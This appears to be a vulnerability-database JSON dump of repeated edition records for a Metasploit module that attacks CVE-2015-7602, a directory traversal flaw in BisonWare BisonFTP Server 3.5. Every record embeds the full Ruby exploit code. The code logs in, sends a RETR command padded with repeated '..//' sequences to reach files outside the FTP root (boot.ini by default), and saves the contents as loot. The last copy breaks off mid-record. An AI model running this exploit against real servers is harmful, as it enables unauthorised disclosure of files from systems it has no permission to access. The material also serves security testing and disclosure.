"bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-03-26T15:56:21", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-03-26T15:56:21", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-03-26T15:56:21", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-03-26T17:50:51", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-03-26T17:50:51", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-03-26T17:50:51", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-03-26T21:50:59", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-03-26T21:50:59", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-03-26T21:50:59", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-07T22:12:56", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-04-07T22:12:56", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-07T22:12:56", "differentElements": ["modified", "published"], "edition": 16}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-08T00:12:12", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-04-08T00:12:12", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-08T00:12:12", "differentElements": ["modified", "published"], "edition": 17}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-20T08:27:52", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-04-08T00:12:12", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-20T08:27:52", "differentElements": ["modified", "published"], "edition": 18}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-20T10:30:37", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-04-08T00:12:12", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + 